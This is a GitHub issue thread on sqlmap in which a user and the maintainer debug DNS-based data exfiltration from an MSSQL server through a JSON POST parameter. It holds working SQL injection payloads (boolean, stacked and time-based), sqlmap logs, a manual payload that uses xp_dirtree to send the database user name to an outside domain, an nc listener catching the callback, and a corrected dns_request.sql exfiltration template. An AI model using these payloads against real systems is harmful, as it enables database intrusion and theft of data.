### ISSUE TITLE
DNS Exfiltration Issue

### ISSUE THREAD

**Issue by adoreste** [sqlmapproject/sqlmap#3370]
Hello,

Apparently sqlmap is failing to detect DNS exfiltration on MSSQL, Don't know if I'm missing something or this might be a bug as I can manually retrieve results. 

**Platform Details**
Microsoft Server 2008 R2
MSSQL Version: Microsoft SQL Server 2012 (SP1) - 11.0.3000.0
Sqlmap Versions Tested: 1.2.10#stable(Arch Repo) && 1.2.11.7#dev (git)
Sqlmap dependencies installed.

**Injection Points (SQLMAP)** 
```
---
Parameter: JSON #1* ((custom) POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: {"FOO":"-8444' OR 3185=3185-- lPSR"}
    Vector: OR [INFERENCE]

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: {"FOO":"admin';WAITFOR DELAY '0:0:5'--"}
    Vector: ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF)
    Payload: {"FOO":"admin' WAITFOR DELAY '0:0:5'-- YjTG"}
    Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'
---
```

**SQLMAP TEST**
```python sqlmap.py --dbms=mssql --risk=3 --level=5 -r /root/req_login.txt --dns-domain DOMAIN.com  -D LOGIC --tables --batch  --common-tables -v3```

```
[15:31:40] [INFO] testing for data retrieval through DNS channel
[15:31:40] [PAYLOAD] -1454'; DECLARE @host varchar(1024); SELECT @host='imz.'+(SELECT master.dbo.fn_varbintohexstr(CAST(SUBSTRING((4457),1,13) AS VARBINARY(8000))))+'.hNR.DOMAIN.com'; EXEC('master..xp_dirtree "\\'+@host+'\cXfU"')--
[15:31:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[15:31:40] [DEBUG] performed 1 queries in 0.08 seconds
[15:31:40] [ERROR] data retrieval through DNS channel failed. Turning off DNS exfiltration support
```

**Manual Tests**
Burp Payload
```{"FOO":"admin';declare @q varchar(99);set @q='\\\\'+SUBSTRING(user_name(),0,10)+'-'+'.DOMAIN.com\\woot'; exec master.dbo.xp_dirtree @q;-- "}```

Running ```nc -vvvnulp 53``` the response is: 
```
Listening on [0.0.0.0] (family 0, port 53)
Connection from 74.125.47.145 53348 received!
portal-DOMAINcom)
```     
  
Manually running the payload used by sqlmap to test the DNS Exfiltration causes an error (seems to me that somehow is breaking the JSON but tamper scripts do not work on the initial test)

Thanks!!

**Comment by stamparm** [comment]
It looks like the double-quote used inside the `EXEC('master..xp_dirtree "` is causing the JSON format to fall apart. Please go to your local `procs/mssqlserver/dns_request.sql` and rewrite it in such way to skip the usage of `"` altogether. As you've probably noticed in your manual payload, you can put everything into `@host` variable. Hence, just rewrite the sqlmap's payload inside that same file to match your payload.

If you are stuck (after not least than 15 seconds of manual work) please come back and I'll try to help you out in rewriting it. Otherwise, I believe that you are capable to do it yourself.

**Comment by adoreste** [comment]
Hi @stamparm, thanks a lot for pointing me out to this file. I've changed the file and tried to make it as simple as possible for this example.

**dns_request.sql:**
```
DECLARE @h varchar(1024);
SET @h='\\\\'+(%QUERY%)+'%SUFFIX%.%DOMAIN%\\sa';
EXEC master.dbo.xp_dirtree @h;

[10:07:56] [INFO] testing for data retrieval through DNS channel
[10:07:56] [PAYLOAD] -8156'; DECLARE @h varchar(1024); SET @h='\\\\'+(SELECT master.dbo.fn_varbintohexstr(CAST(SUBSTRING((9495),1,13) AS VARBINARY(8000))))+'IMJ.DOMAIN.com\\sa'; EXEC master.dbo.xp_dirtree @h; --
[10:07:56] [DEBUG] performed 1 queries in 0.11 seconds
[10:07:56] [ERROR] data retrieval through DNS channel failed. Turning off DNS exfiltration support
```

Although manually executing the request generated by SQLMap touches back the server,
```
{"FOO":"admin';DECLARE @h varchar(1024);SET @q='\\\\'+(SELECT master.dbo.fn_varbintohexstr(CAST(SUBSTRING((ISNULL(CAST(1594 AS NVARCHAR(4000)),' ')),1,13) AS VARBINARY(8000))))+'.DOMAIN.com\\sa'; EXEC master.dbo.xp_dirtree @h;-- "}
```
It keeps failing to detect the DNS Exfiltration channel... It seems to me that I'm missing something really stupid over here. 

Thanks a million!

**Comment by stamparm** [comment]
`%PREFIX%` and `%SUFFIX%` have to be around the `%QUERY%`. That is how sqlmap recognizes the USEFUL part of the response.

You've used only `%SUFFIX%` as I can see

**Comment by adoreste** [comment]
Thanks a million @stamparm, now is working like a charm!

**dns_request.sql:**
```
DECLARE @h varchar(1024);
SET @h='\\\\%PREFIX%.'+(%QUERY%)+'.%SUFFIX%.%DOMAIN%\\%RANDSTR1%';
EXEC master.dbo.xp_dirtree @h;
```
Missed the dots after %PREFIX% and before %SUFFIX% too, just in case somebody lands here having a similar issue. 

Best regards,
